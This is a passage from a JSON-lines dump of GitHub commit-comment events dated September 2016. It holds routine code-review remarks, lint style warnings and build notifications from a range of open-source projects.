~^~\n```\n[tests/testthat/test_abc_smc_nltt.R:36:46:](https://github.com/richelbilderbeek/nLTT/blob/564c9931afef88e05aa63681d80b431a5df4c4e2/tests/testthat/test_abc_smc_nltt.R#L36) *style:* **Commas should always have a space after.**\n```r\n​  ML <- stats::optimize(f=tofit,interval=c(0,1))\n                                             ^\n```\n[tests/testthat/test_abc_smc_nltt.R:48:12:](https://github.com/richelbilderbeek/nLTT/blob/564c9931afef88e05aa63681d80b431a5df4c4e2/tests/testthat/test_abc_smc_nltt.R#L48) *style:* **Commas should always have a space after.**\n```r\n​  cat(\"\\n\",mean(A),ML$minimum,\"\\n\")\n           ^\n```\n[tests/testthat/test_abc_smc_nltt.R:48:20:](https://github.com/richelbilderbeek/nLTT/blob/564c9931afef88e05aa63681d80b431a5df4c4e2/tests/testthat/test_abc_smc_nltt.R#L48) *style:* **Commas should always have a space after.**\n```r\n​  cat(\"\\n\",mean(A),ML$minimum,\"\\n\")\n                   ^\n```\n[tests/testthat/test_abc_smc_nltt.R:48:31:](https://github.com/richelbilderbeek/nLTT/blob/564c9931afef88e05aa63681d80b431a5df4c4e2/tests/testthat/test_abc_smc_nltt.R#L48) *style:* **Commas should always have a space after.**\n```r\n​  cat(\"\\n\",mean(A),ML$minimum,\"\\n\")\n                              ^\n```"}},"created_at":"2016-09-15T14:28:25Z"}
{"id":"4568439867","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19037303,"position":12,"line":160,"path":"src/support.cpp","commit_id":"a2c5a73f093dfa2f4074f2a8e60aa9c9f3a441d5","created_at":"2016-09-15T14:28:25Z","updated_at":"2016-09-15T14:28:25Z","body":"You can move the `mesh.getSettingBoolean(\"support_interface_enable\")` into this block now, or even leave out the variable and directly put it in the `if`."}},"created_at":"2016-09-15T14:28:25Z"}
{"id":"4568439990","type":"CommitCommentEvent","actor":{"login":"richardperryman"},"repo":{"name":"richardperryman/NFC-Engineering-Project"},"payload":{"comment":{"id":19037305,"position":null,"line":null,"path":null,"commit_id":"f01bd3e746b23e1cadef12c5d687b74d38fbb235","created_at":"2016-09-15T14:28:27Z","updated_at":"2016-09-15T14:28:27Z","body":"Why was the `\\grid` added here?"}},"created_at":"2016-09-15T14:28:27Z"}
{"id":"4568441747","type":"CommitCommentEvent","actor":{"login":"zijistark"},"repo":{"name":"EMFTeam/EMF"},"payload":{"comment":{"id":19037307,"position":null,"line":null,"path":null,"commit_id":"04a93d357a9590147b4343fbb6db11f1e0fffa20","created_at":"2016-09-15T14:28:42Z","updated_at":"2016-09-15T14:28:42Z","body":"Eventually, I guess it should go directly into the MiniSWMH mod, unless we actually want to make EMF-specific modifications to it. I want to sync with @escalonn before I go ahead with that, however."}},"created_at":"2016-09-15T14:28:42Z"}
{"id":"4568442520","type":"CommitCommentEvent","actor":{"login":"rohit-batra"},"repo":{"name":"Microsoft/vsts-tasks"},"payload":{"comment":{"id":19037310,"position":115,"line":195,"path":"Tasks/SqlAzureDacpacDeployment/Utility.ps1","commit_id":"4cefaf18b6753d0408be6d97715ae86e404e6822","created_at":"2016-09-15T14:28:49Z","updated_at":"2016-09-15T14:28:49Z","body":"Hello Mathieu,\r\n\r\n1. The actual Error Being thrown is \"##[debug]*** An error occurred during deployment plan generation. Deployment cannot continue.\"\r\nThis is being thrown by SqlPackage.exe due to some internal exe error and there is not much control on this from our side.\r\n2. throw $_.Exception -- This is line 253 of version 1.0.26 which is being shown here , but that is just passing on the actual error which is noted above in point 1.\r\n3. Next version will be available in 2-3 weeks . (1.0.27 or beyond), i am not sure if it will address this specific issue which seems to generated from exe. \r\nI hope this answers your Query.\r\nIf you face any issue/have some query, please share in more details , either here or at RM_Customer_Queries (at) microsoft (dot) com "}},"created_at":"2016-09-15T14:28:49Z"}
{"id":"4568443220","type":"CommitCommentEvent","actor":{"login":"mclow"},"repo":{"name":"boostorg/format"},"payload":{"comment":{"id":19037314,"position":null,"line":null,"path":null,"commit_id":"74a7de41f01f9d1f7bf8ff66982ae7f3d1a11f25","created_at":"2016-09-15T14:28:56Z","updated_at":"2016-09-15T14:28:56Z","body":"I guess I wasn't clear.   What I meant was to refer to the name of the section \"fpos.operations\" rather than the number.\r\n\r\nThe number can change from standard to standard, but the names are supposed to be stable. \r\n(in spite of the fact that they removed \"lib.\" from the front of all the library sections for C++11, so `[lib.fpos.operations]` became `[fpos.operations]`)"}},"created_at":"2016-09-15T14:28:56Z"}
{"id":"4568445605","type":"CommitCommentEvent","actor":{"login":"shorowit"},"repo":{"name":"NREL/OpenStudio-BEopt"},"payload":{"comment":{"id":19037321,"position":null,"line":null,"path":null,"commit_id":"0f5f167c088886256d281c463e21fe8df5f6ea35","created_at":"2016-09-15T14:29:20Z","updated_at":"2016-09-15T14:29:20Z","body":"@joseph-robertson I diffed equivalent IDFs (well, just the EMS programs/subroutines here) generated via BEopt/E+ and OpenStudio/E+."}},"created_at":"2016-09-15T14:29:20Z"}
{"id":"4568446726","type":"CommitCommentEvent","actor":{"login":"MrMC"},"repo":{"name":"MrMC/mrmc"},"payload":{"comment":{"id":19037324,"position":null,"line":null,"path":null,"commit_id":"3ac9c677bca0b4a8675e0af513f5a2272fda8603","created_at":"2016-09-15T14:29:29Z","updated_at":"2016-09-15T14:29:29Z","body":"I think this matches kodi now. Player sync works a little different in v17 than in v16. \r\nWill double check again. "}},"created_at":"2016-09-15T14:29:29Z"}
{"id":"4568452402","type":"CommitCommentEvent","actor":{"login":"twest820"},"repo":{"name":"CascadesCarnivoreProject/Timelapse"},"payload":{"comment":{"id":19037350,"position":40,"line":54,"path":"Timelapse2TemplateEditor/TimelapseTemplateEditor/DialogEditChoiceList.xaml.cs","commit_id":"c66043ee4417bf4c5369b02f79c2845334e3a811","created_at":"2016-09-15T14:30:27Z","updated_at":"2016-09-15T14:30:27Z","body":"Prefer consistent code.  The codebase is inconsistent regarding this but a majority of editor and Timelapse UX classes set callbacks in their constructors.  Is there a reason to follow the minority pattern?"}},"created_at":"2016-09-15T14:30:27Z"}
{"id":"4568452529","type":"CommitCommentEvent","actor":{"login":"bm956"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19037351,"position":null,"line":null,"path":null,"commit_id":"95be29e1c6b7a06ac444d5142582ebece79698ff","created_at":"2016-09-15T14:30:28Z","updated_at":"2016-09-15T14:30:28Z","body":"So will this fix it for all without applying workaround from #10654 ?"}},"created_at":"2016-09-15T14:30:28Z"}
{"id":"4568456273","type":"CommitCommentEvent","actor":{"login":"zijistark"},"repo":{"name":"EMFTeam/EMF"},"payload":{"comment":{"id":19037358,"position":null,"line":null,"path":null,"commit_id":"e7a42ba6548b3d8a50e2f4d329d7c842dd569e17","created_at":"2016-09-15T14:31:05Z","updated_at":"2016-09-15T14:31:05Z","body":"Thanks. Didn't notice this, was just about to do it, and now I don't have to do so. :)"}},"created_at":"2016-09-15T14:31:05Z"}
{"id":"4568456502","type":"CommitCommentEvent","actor":{"login":"CodingCat"},"repo":{"name":"dmlc/xgboost"},"payload":{"comment":{"id":19037360,"position":27,"line":36,"path":"jvm-packages/xgboost4j-spark/src/main/scala/ml/dmlc/xgboost4j/scala/spark/XGBoostModel.scala","commit_id":"fb02797e2ac3ea41f52facb3469926575c4d63cb","created_at":"2016-09-15T14:31:07Z","updated_at":"2016-09-15T14:31:07Z","body":"Regressor/RegressionModel are implemented as classes in Spark, so we still need to move to predictor/preditionModel level, \r\n\r\nI think extending PreditionModel/Predictor can fill the requirements you mentioned, metrics other than AUC, multiclass classification, \r\n\r\ndid I miss anything?"}},"created_at":"2016-09-15T14:31:07Z"}
{"id":"4568456503","type":"CommitCommentEvent","actor":{"login":"Meticulus"},"repo":{"name":"Meticulus/android_device_samsung_codinalte"},"payload":{"comment":{"id":19037361,"position":null,"line":null,"path":null,"commit_id":"7aaabe8577a61a2b0cd039670cd639c0a06373d3","created_at":"2016-09-15T14:31:08Z","updated_at":"2016-09-15T14:31:08Z","body":"I used an app called Android sensor box to get info about the sensors. The accelerometer \"RESOLUTION\" is important. Otherwise the just check that the paths in codinalte.h exist. For proximity I did not need to set any configuration. I do remember that the default threshold was about 600 or 650... \r\n\r\nThe accellerometer should have a sysfs path that you can cat, that produces 3 comma delimited numbers. \r\nIf not, then it will have an input path that can be read with ABS INPUT data that can be read. It also might have both..."}},"created_at":"2016-09-15T14:31:08Z"}
{"id":"4568461248","type":"CommitCommentEvent","actor":{"login":"shorowit"},"repo":{"name":"NREL/OpenStudio-BEopt"},"payload":{"comment":{"id":19037374,"position":null,"line":null,"path":null,"commit_id":"0f5f167c088886256d281c463e21fe8df5f6ea35","created_at":"2016-09-15T14:31:53Z","updated_at":"2016-09-15T14:31:53Z","body":"@joseph-robertson I believe that the next release of EnergyPlus (to be included in OS 2.0) is supposed to do better error-checking for invalid variable names. In the current EnergyPlus, if you specify a variable name that was never initialized or hooked up before, EMS silently initializes it to 0 and execution continues. So hopefully with OS 2.0, it will become much easier to detect these problems."}},"created_at":"2016-09-15T14:31:53Z"}
{"id":"4568461413","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19037375,"position":26,"line":438,"path":"src/utils/polygon.cpp","commit_id":"955399765c62f1a37df6d822d22c882872d837d9","created_at":"2016-09-15T14:31:54Z","updated_at":"2016-09-15T14:31:54Z","body":":octopus:"}},"created_at":"2016-09-15T14:31:54Z"}
{"id":"4568463961","type":"CommitCommentEvent","actor":{"login":"MrMC"},"repo":{"name":"MrMC/mrmc"},"payload":{"comment":{"id":19037385,"position":null,"line":null,"path":null,"commit_id":"a5195029320801dd502cc65b2dc3b5ca9d6d7ca8","created_at":"2016-09-15T14:32:22Z","updated_at":"2016-09-15T14:32:22Z","body":"All android platforms ? It looks like fireOS is setting up hdmi right but I see messages about burst pause too large coming from droid spdif. Now why spdif is even in the loop is a question as by then, packets are IEC and eac3/7.1 channels needs 192kHz."}},"created_at":"2016-09-15T14:32:22Z"}
{"id":"4568463997","type":"CommitCommentEvent","actor":{"login":"twest820"},"repo":{"name":"CascadesCarnivoreProject/Timelapse"},"payload":{"comment":{"id":19037386,"position":58,"line":82,"path":"Timelapse2TemplateEditor/TimelapseTemplateEditor/DialogEditChoiceList.xaml.cs","commit_id":"c66043ee4417bf4c5369b02f79c2845334e3a811","created_at":"2016-09-15T14:32:22Z","updated_at":"2016-09-15T14:32:22Z","body":"Did StyleCop catch the missing this.?"}},"created_at":"2016-09-15T14:32:22Z"}
{"id":"4568465419","type":"CommitCommentEvent","actor":{"login":"ian-ross"},"repo":{"name":"Cadasta/cadasta-platform"},"payload":{"comment":{"id":19037388,"position":12,"line":2121,"path":"cadasta/config/locale/pt/LC_MESSAGES/django.po","commit_id":"3a7283c87a7ba6434c53d25f8f0e5f37d6b84f2a","created_at":"2016-09-15T14:32:36Z","updated_at":"2016-09-15T14:32:36Z","body":"OK, I've fixed a couple of places where there were spaces in closing tags, but I don't know what else to look for.  As Oliver said, it's not obvious that it's such a good idea to have translatable strings with HTML tags in them, but it's hard to see how to do things any other way in these cases."}},"created_at":"2016-09-15T14:32:36Z"}
{"id":"4568466168","type":"CommitCommentEvent","actor":{"login":"jandersson"},"repo":{"name":"mateuszbuda/id2221"},"payload":{"comment":{"id":19037393,"position":17,"line":54,"path":"lab1/topten/src/sics/TopTen.java","commit_id":"99d13b3d76fe6d6525f5e316818fbc317fcc889c","created_at":"2016-09-15T14:32:43Z","updated_at":"2016-09-15T14:32:43Z","body":"firstKey is the lowest key"}},"created_at":"2016-09-15T14:32:43Z"}
{"id":"4568466650","type":"CommitCommentEvent","actor":{"login":"drkutuzov"},"repo":{"name":"s123594/modellingProject"},"payload":{"comment":{"id":19037394,"position":36,"line":36,"path":"wholeFunction2d.py","commit_id":"f619d85489d523abe82b709a6d5c7a14d83d70cd","created_at":"2016-09-15T14:32:48Z","updated_at":"2016-09-15T14:32:48Z","body":"Again, just return the expression - myFilt + np.max(myFilt) "}},"created_at":"2016-09-15T14:32:48Z"}
{"id":"4568467090","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19037398,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-15T14:32:51Z","updated_at":"2016-09-15T14:32:51Z","body":"@LoneGazebo can you please sync up your latest changes that you made to Active Diplomacy? I'm going to merge all that into my DLL. I've had to separate out some functions and want to integrate your changes before I do pull request. Thank you!"}},"created_at":"2016-09-15T14:32:51Z"}
{"id":"4568469824","type":"CommitCommentEvent","actor":{"login":"igorRovenki"},"repo":{"name":"FriendsOfSymfony/FOSUserBundle"},"payload":{"comment":{"id":19037407,"position":39,"line":259,"path":"FOSUserEvents.php","commit_id":"301f9cc96cac427e916945ce19860c55484ac2f4","created_at":"2016-09-15T14:33:18Z","updated_at":"2016-09-15T14:33:18Z","body":"@javihgil looks like this should be `const USER_DEACTIVATED = 'fos_user.user.deactivated';` ?"}},"created_at":"2016-09-15T14:33:18Z"}
{"id":"4568470314","type":"CommitCommentEvent","actor":{"login":"fred3m"},"repo":{"name":"lsst/pipe_tasks"},"payload":{"comment":{"id":19037408,"position":69,"line":364,"path":"python/lsst/pipe/tasks/mocks/simpleMapper.py","commit_id":"093032395ae62bb8a3a5fb710b9c46631d221834","created_at":"2016-09-15T14:33:23Z","updated_at":"2016-09-15T14:33:23Z","body":"fixed"}},"created_at":"2016-09-15T14:33:23Z"}
{"id":"4568470732","type":"CommitCommentEvent","actor":{"login":"reduz"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":19037409,"position":null,"line":null,"path":null,"commit_id":"a4156f1f0a69bcf4d7c1f43550a39a76cc389e0a","created_at":"2016-09-15T14:33:26Z","updated_at":"2016-09-15T14:33:26Z","body":"For 3D it's already really easy, since you can simply load a character with\na camera as a child of the other viewport.\n\n\nOn Thu, Sep 15, 2016 at 11:27 AM, volzhs <notifications@github.com> wrote:\n\n> @silverkorn <https://github.com/silverkorn> I guess so\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/godotengine/godot/commit/a4156f1f0a69bcf4d7c1f43550a39a76cc389e0a#commitcomment-19037271>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AF-Z25-W2PziSn3USO9gKYzVqYMVAqHfks5qqVXJgaJpZM4J9mVc>\n> .\n>\n"}},"created_at":"2016-09-15T14:33:26Z"}
{"id":"4568473487","type":"CommitCommentEvent","actor":{"login":"reduz"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":19037412,"position":null,"line":null,"path":null,"commit_id":"a4156f1f0a69bcf4d7c1f43550a39a76cc389e0a","created_at":"2016-09-15T14:33:51Z","updated_at":"2016-09-15T14:33:51Z","body":"The limitation in 2D is that you need the tree drawing order\n\nOn Thu, Sep 15, 2016 at 11:33 AM, Juan Linietsky <reduzio@gmail.com> wrote:\n\n> For 3D it's already really easy, since you can simply load a character\n> with a camera as a child of the other viewport.\n>\n>\n> On Thu, Sep 15, 2016 at 11:27 AM, volzhs <notifications@github.com> wrote:\n>\n>> @silverkorn <https://github.com/silverkorn> I guess so\n>>\n>> —\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/godotengine/godot/commit/a4156f1f0a69bcf4d7c1f43550a39a76cc389e0a#commitcomment-19037271>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AF-Z25-W2PziSn3USO9gKYzVqYMVAqHfks5qqVXJgaJpZM4J9mVc>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-15T14:33:51Z"}
{"id":"4568474581","type":"CommitCommentEvent","actor":{"login":"jandersson"},"repo":{"name":"mateuszbuda/id2221"},"payload":{"comment":{"id":19037414,"position":10,"line":49,"path":"lab1/topten/src/sics/TopTen.java","commit_id":"99d13b3d76fe6d6525f5e316818fbc317fcc889c","created_at":"2016-09-15T14:34:02Z","updated_at":"2016-09-15T14:34:02Z","body":"value was a string for an entire xml row entry, so changed it to username"}},"created_at":"2016-09-15T14:34:02Z"}
{"id":"4568478121","type":"CommitCommentEvent","actor":{"login":"witold-jedrzejewski-codilime"},"repo":{"name":"Ajk4/spark-perf"},"payload":{"comment":{"id":19037422,"position":36,"line":337,"path":"mllib-tests/v1p5/src/main/scala/mllib/perf/MLAlgorithmTests.scala","commit_id":"19900e5bbc5ee1b0957dba692be858e2b9cffe95","created_at":"2016-09-15T14:34:39Z","updated_at":"2016-09-15T14:34:39Z","body":"set it to maximum possible"}},"created_at":"2016-09-15T14:34:39Z"}
{"id":"4568478939","type":"CommitCommentEvent","actor":{"login":"timj"},"repo":{"name":"lsst/pipe_tasks"},"payload":{"comment":{"id":19037427,"position":69,"line":364,"path":"python/lsst/pipe/tasks/mocks/simpleMapper.py","commit_id":"093032395ae62bb8a3a5fb710b9c46631d221834","created_at":"2016-09-15T14:34:46Z","updated_at":"2016-09-15T14:34:46Z","body":"Thanks. I'm really not a fan of `map` these days..."}},"created_at":"2016-09-15T14:34:46Z"}
{"id":"4568479146","type":"CommitCommentEvent","actor":{"login":"witold-jedrzejewski-codilime"},"repo":{"name":"Ajk4/spark-perf"},"payload":{"comment":{"id":19037429,"position":41,"line":342,"path":"mllib-tests/v1p5/src/main/scala/mllib/perf/MLAlgorithmTests.scala","commit_id":"19900e5bbc5ee1b0957dba692be858e2b9cffe95","created_at":"2016-09-15T14:34:48Z","updated_at":"2016-09-15T14:34:48Z","body":"remove"}},"created_at":"2016-09-15T14:34:48Z"}
{"id":"4568481449","type":"CommitCommentEvent","actor":{"login":"FBerendsen"},"repo":{"name":"kaspermarstal/SuperElastix"},"payload":{"comment":{"id":19037441,"position":null,"line":null,"path":null,"commit_id":"7ca133d888ae89ad0e7e85ed85b33cce03e6c7e7","created_at":"2016-09-15T14:35:14Z","updated_at":"2016-09-15T14:35:14Z","body":"Ok we could do that, but I think the reasoning is a bit odd. Can't we force the user to use C++11 via Cmake? (We do set those flags ourselves in the SuperBuild). We are depending on C++11 anyways, it is a prerequisite."}},"created_at":"2016-09-15T14:35:14Z"}
{"id":"4568481722","type":"CommitCommentEvent","actor":{"login":"witold-jedrzejewski-codilime"},"repo":{"name":"Ajk4/spark-perf"},"payload":{"comment":{"id":19037443,"position":74,"line":366,"path":"mllib-tests/v1p5/src/main/scala/mllib/perf/MLAlgorithmTests.scala","commit_id":"19900e5bbc5ee1b0957dba692be858e2b9cffe95","created_at":"2016-09-15T14:35:16Z","updated_at":"2016-09-15T14:35:16Z","body":"calculate sum and then divide by sum ncols"}},"created_at":"2016-09-15T14:35:16Z"}
{"id":"4568484695","type":"CommitCommentEvent","actor":{"login":"ljbrackney"},"repo":{"name":"NREL/OpenStudio-BEopt"},"payload":{"comment":{"id":19037450,"position":null,"line":null,"path":null,"commit_id":"0f5f167c088886256d281c463e21fe8df5f6ea35","created_at":"2016-09-15T14:35:43Z","updated_at":"2016-09-15T14:35:43Z","body":"E+ 8.6 has been included since the 1.12.5 iteration build I believe.  It will be officially supported in OS the 1.13.0, which will be released before 2.0.0.\n\n   - larry\n\nFrom: Scott Horowitz <notifications@github.com<mailto:notifications@github.com>>\nReply-To: NREL/OpenStudio-BEopt <reply@reply.github.com<mailto:reply@reply.github.com>>\nDate: Thursday, September 15, 2016 at 8:31 AM\nTo: NREL/OpenStudio-BEopt <OpenStudio-BEopt@noreply.github.com<mailto:OpenStudio-BEopt@noreply.github.com>>\nSubject: Re: [NREL/OpenStudio-BEopt] More Airflow EMS bugfixes. (0f5f167)\n\n\n@joseph-robertson<https://github.com/joseph-robertson> I believe that the next release of EnergyPlus (to be included in OS 2.0) is supposed to do better error-checking for invalid variable names. In the current EnergyPlus, if you specify a variable name that was never initialized or hooked up before, EMS silently initializes it to 0 and execution continues. So hopefully with OS 2.0, it will become much easier to detect these problems.\n\n-\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly, view it on GitHub<https://github.com/NREL/OpenStudio-BEopt/commit/0f5f167c088886256d281c463e21fe8df5f6ea35#commitcomment-19037374>, or mute the thread<https://github.com/notifications/unsubscribe-auth/ACIHhryw-Kk8ZlQkjNg_nzErStqNPd20ks5qqVbZgaJpZM4J9XfK>.\n"}},"created_at":"2016-09-15T14:35:43Z"}
{"id":"4568484715","type":"CommitCommentEvent","actor":{"login":"bumbadadabum"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19037451,"position":null,"line":null,"path":null,"commit_id":"6cc92e26245fcbae21efef77468955aed5f62f34","created_at":"2016-09-15T14:35:43Z","updated_at":"2016-09-15T14:35:43Z","body":"I switched to a different text editor, which might have messed it up. Sorry\nfor not checking this.\n"}},"created_at":"2016-09-15T14:35:43Z"}
{"id":"4568485175","type":"CommitCommentEvent","actor":{"login":"witold-jedrzejewski-codilime"},"repo":{"name":"Ajk4/spark-perf"},"payload":{"comment":{"id":19037453,"position":14,"line":416,"path":"config/config.py","commit_id":"19900e5bbc5ee1b0957dba692be858e2b9cffe95","created_at":"2016-09-15T14:35:47Z","updated_at":"2016-09-15T14:35:47Z","body":"add comment"}},"created_at":"2016-09-15T14:35:47Z"}
{"id":"4568485369","type":"CommitCommentEvent","actor":{"login":"sebcat"},"repo":{"name":"sebcat/move-literals"},"payload":{"comment":{"id":19037455,"position":27,"line":44,"path":"move-literals.lua","commit_id":"cca5e3b78a36d85848165fa1644af03bc05b74f1","created_at":"2016-09-15T14:35:49Z","updated_at":"2016-09-15T14:35:49Z","body":"In this context, yes (any byte). It is interpreted as a TAny node repeated 'n' times when the tree is built. Had it been 2 it would match 2 bytes.\r\n\r\nThe expression (x-y) tries to match the pattern x if matching the pattern y fails. If y succeeds, the match fails. It is probably better explained here: http://www.inf.puc-rio.br/~roberto/lpeg/#op-sub"}},"created_at":"2016-09-15T14:35:49Z"}
{"id":"4568488069","type":"CommitCommentEvent","actor":{"login":"jandersson"},"repo":{"name":"mateuszbuda/id2221"},"payload":{"comment":{"id":19037465,"position":32,"line":138,"path":"lab1/topten/src/sics/TopTen.java","commit_id":"99d13b3d76fe6d6525f5e316818fbc317fcc889c","created_at":"2016-09-15T14:36:18Z","updated_at":"2016-09-15T14:36:18Z","body":"I forgot to uncomment this before pushing, i was just trying something out, ill change it back"}},"created_at":"2016-09-15T14:36:18Z"}
{"id":"4568489340","type":"CommitCommentEvent","actor":{"login":"santaclauss"},"repo":{"name":"Datatekniikka/TaistoCMS"},"payload":{"comment":{"id":19037467,"position":1,"line":1,"path":"css/style.css","commit_id":"92b6c8b6ae0340a04f57c91fe25927bba3700c79","created_at":"2016-09-15T14:36:31Z","updated_at":"2016-09-15T14:36:31Z","body":"Olkitu "}},"created_at":"2016-09-15T14:36:31Z"}
{"id":"4568489510","type":"CommitCommentEvent","actor":{"login":"xyyx"},"repo":{"name":"DirtyUnicorns/android_packages_apps_Settings"},"payload":{"comment":{"id":19037468,"position":null,"line":null,"path":null,"commit_id":"2cc5f0457adfb02100c3c030badb5b30eeaa2afa","created_at":"2016-09-15T14:36:33Z","updated_at":"2016-09-15T14:36:33Z","body":"https://github.com/nitrogen-project/android_packages_apps_Settings/commit/250ecb01f64742e52fb6a44055a6ff9b95f0e143"}},"created_at":"2016-09-15T14:36:33Z"}
{"id":"4568490303","type":"CommitCommentEvent","actor":{"login":"aviadhahami"},"repo":{"name":"jacklam718/react-native-popup-dialog"},"payload":{"comment":{"id":19037472,"position":null,"line":null,"path":null,"commit_id":"284417ae70d1eab8b0c0fdb9e18ea8601035d741","created_at":"2016-09-15T14:36:40Z","updated_at":"2016-09-15T14:36:40Z","body":"ok, nice catch :+1: \r\nMight wanna check how to pad the content without the heading"}},"created_at":"2016-09-15T14:36:40Z"}
{"id":"4568492356","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19037478,"position":null,"line":null,"path":null,"commit_id":"1523a882f09e4616c63e51bca69e99fdfc31090c","created_at":"2016-09-15T14:36:59Z","updated_at":"2016-09-15T14:36:59Z","body":"TeamCity Todo :: Build [Build 102](http://109.103.226.38:8512/viewLog.html?buildId=38497&buildTypeId=Todo_Build) is now running\n"}},"created_at":"2016-09-15T14:36:59Z"}
{"id":"4568493507","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19037480,"position":null,"line":null,"path":null,"commit_id":"1523a882f09e4616c63e51bca69e99fdfc31090c","created_at":"2016-09-15T14:37:11Z","updated_at":"2016-09-15T14:37:11Z","body":"TeamCity Todo :: Build [Build 102](http://109.103.226.38:8512/viewLog.html?buildId=38497&buildTypeId=Todo_Build) outcome was **SUCCESS**\nSummary: Tests passed: 19 Build time: 00:00:12"}},"created_at":"2016-09-15T14:37:11Z"}
{"id":"4568494660","type":"CommitCommentEvent","actor":{"login":"jgranick"},"repo":{"name":"openfl/openfl"},"payload":{"comment":{"id":19037482,"position":null,"line":null,"path":null,"commit_id":"02c63dc9a2606e94259a9596a3f386b23c7e9153","created_at":"2016-09-15T14:37:22Z","updated_at":"2016-09-15T14:37:22Z","body":"I think it was made after -- I had a system which had its system time off by 14 hours or so 😕 "}},"created_at":"2016-09-15T14:37:22Z"}
{"id":"4568496299","type":"CommitCommentEvent","actor":{"login":"abenezerabebe"},"repo":{"name":"abenezerabebe/abenezerabebe.github.io"},"payload":{"comment":{"id":19037486,"position":null,"line":null,"path":null,"commit_id":"f11273f32f5e87c13390bc26f165d84020fcdc0e","created_at":"2016-09-15T14:37:38Z","updated_at":"2016-09-15T14:37:38Z","body":"Done!"}},"created_at":"2016-09-15T14:37:38Z"}
{"id":"4568497936","type":"CommitCommentEvent","actor":{"login":"Mirko724"},"repo":{"name":"Mirko724/hello-world"},"payload":{"comment":{"id":19037490,"position":null,"line":null,"path":null,"commit_id":"ecc352882a08af63eca9cebd842b9572ef566f90","created_at":"2016-09-15T14:37:52Z","updated_at":"2016-09-15T14:37:52Z","body":"prova1"}},"created_at":"2016-09-15T14:37:52Z"}
{"id":"4568498591","type":"CommitCommentEvent","actor":{"login":"drkutuzov"},"repo":{"name":"s123594/modellingProject"},"payload":{"comment":{"id":19037492,"position":41,"line":41,"path":"wholeFunction2d.py","commit_id":"f619d85489d523abe82b709a6d5c7a14d83d70cd","created_at":"2016-09-15T14:37:59Z","updated_at":"2016-09-15T14:37:59Z","body":"Whenever you decide to use for loop to make some numpy array arithmetic -- you can do it much more faster and efficiently without for loop. \r\nif you add two arrays with shapes (120, 512) -- image and mask-like 1d array with shape (120,) you get an error.\r\nwhat you can do is to introduce an additional (empty axis), so instead of 1d mask you have an image where the columns are all identical -- mask(:, np.newaxis)!\r\nNow you can add them without for loop:\r\n result = image + mask[:, newaxis] and that is it -- check this out - http://docs.scipy.org/doc/numpy/user/basics.broadcasting.html"}},"created_at":"2016-09-15T14:37:59Z"}
{"id":"4568499168","type":"CommitCommentEvent","actor":{"login":"justinmk"},"repo":{"name":"Shougo/neovim"},"payload":{"comment":{"id":19037494,"position":6,"line":766,"path":"src/nvim/fold.c","commit_id":"2cf93446bf3f25a894f92706b3a8dea065d97320","created_at":"2016-09-15T14:38:05Z","updated_at":"2016-09-15T14:38:05Z","body":"Why wasn't the compl_busy check enough? Since you added the change in edit.c..."}},"created_at":"2016-09-15T14:38:05Z"}
{"id":"4568499234","type":"CommitCommentEvent","actor":{"login":"fred3m"},"repo":{"name":"lsst/pipe_tasks"},"payload":{"comment":{"id":19037495,"position":69,"line":364,"path":"python/lsst/pipe/tasks/mocks/simpleMapper.py","commit_id":"093032395ae62bb8a3a5fb710b9c46631d221834","created_at":"2016-09-15T14:38:06Z","updated_at":"2016-09-15T14:38:06Z","body":"Yeah, there have been a few of these scattered throughout the code. While there are some legitimate use cases for map, I agree that this isn't one of them."}},"created_at":"2016-09-15T14:38:06Z"}
{"id":"4568500107","type":"CommitCommentEvent","actor":{"login":"twest820"},"repo":{"name":"CascadesCarnivoreProject/Timelapse"},"payload":{"comment":{"id":19037497,"position":7,"line":180,"path":"Timelapse2TemplateEditor/TimelapseTemplateEditor/Util/EditorControls.cs","commit_id":"c66043ee4417bf4c5369b02f79c2845334e3a811","created_at":"2016-09-15T14:38:16Z","updated_at":"2016-09-15T14:38:16Z","body":"Prefer encapsulation.  Consider again ownership by Utilities."}},"created_at":"2016-09-15T14:38:16Z"}
{"id":"4568506700","type":"CommitCommentEvent","actor":{"login":"pexcn"},"repo":{"name":"CyanogenMod/android_system_core"},"payload":{"comment":{"id":19037509,"position":null,"line":null,"path":null,"commit_id":"2cdbe550a6739966b0237a27e4660169a59f2662","created_at":"2016-09-15T14:39:21Z","updated_at":"2016-09-15T14:39:21Z","body":"I am alse have build error, on media-caf (msm8960 branch)"}},"created_at":"2016-09-15T14:39:21Z"}
{"id":"4568508485","type":"CommitCommentEvent","actor":{"login":"shorowit"},"repo":{"name":"NREL/OpenStudio-BEopt"},"payload":{"comment":{"id":19037512,"position":null,"line":null,"path":null,"commit_id":"0f5f167c088886256d281c463e21fe8df5f6ea35","created_at":"2016-09-15T14:39:35Z","updated_at":"2016-09-15T14:39:35Z","body":"Ah, great. Thanks for the info. @joseph-robertson @jmaguire1 let's all update to OS 1.12.5."}},"created_at":"2016-09-15T14:39:35Z"}
